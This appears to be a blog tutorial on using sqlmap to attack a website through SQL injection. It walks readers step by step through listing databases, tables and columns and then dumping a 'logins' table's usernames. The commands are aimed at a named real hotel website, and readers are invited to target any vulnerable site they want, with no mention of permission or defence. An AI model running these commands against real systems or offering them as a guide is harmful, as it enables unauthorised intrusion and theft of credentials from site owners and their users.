If, you have Windows XP you have to download Python here:Click Here To Download [DOWNLOAD VERSION 2.7.6]
1- Extract .rar file to C:
2- Open your cmd and type: cd\
![[Image: xh19y4uzy8vt4kjd1em3.png]](http://alojaimagens.com/images/xh19y4uzy8vt4kjd1em3.png)
3-Now, type: cd sqlmap\
![[Image: qn7d5jpjycvf4uh6b12u.png]](http://alojaimagens.com/images/qn7d5jpjycvf4uh6b12u.png)
4- Type: sqlmap.py -u http://site.com/index.php?id=1 --dbs
In "http://site.com/index.php?id=1" you type the site you want, but site have to be vulnerable. I will use www.parkhotel.pt/nm_quemsomos.php?id=144
It will give you the dbs of site "Database"
5- Now, normally will appeare in dbs "information_schema" that DB don't have anything don't try dump that.. I have 2 dbs, "information_schema" and "parkhotel" i will type sqlmap.py -u www.parkhotel.pt/nm_quemsomos.php?id=144 -D parkhotel --tables \\Explain:"-D parkhotel" why i don't put --dbs, because im not trying to find dbs "--dbs is to find the dbs", and -D is a sign i already have DB.
![[Image: t5h72pdy1ayhi58uwxr.png]](http://alojaimagens.com/images/t5h72pdy1ayhi58uwxr.png)
6- I already have the tables .. like you see down here .. Now type this: sqlmap.py -u www.parkhotel.pt/nm_quemsomos.php?id=144 -D parkhotel -T logins --columns (i choose logins table) this code will give you the collumns of table
![[Image: s6waj6n2w70c4eea3ht3.png]](http://alojaimagens.com/images/s6waj6n2w70c4eea3ht3.png)
7- Finally i will dump the collumns with command: sqlmap.py -u www.parkhotel.pt/nm_quemsomos.php?id=144 -D parkhotel -T logins -C username --dump
![[Image: 2fnp27617w8p6faw18y.png]](http://alojaimagens.com/images/2fnp27617w8p6faw18y.png)
If you need help with something, comment here
0 comments:
Post a Comment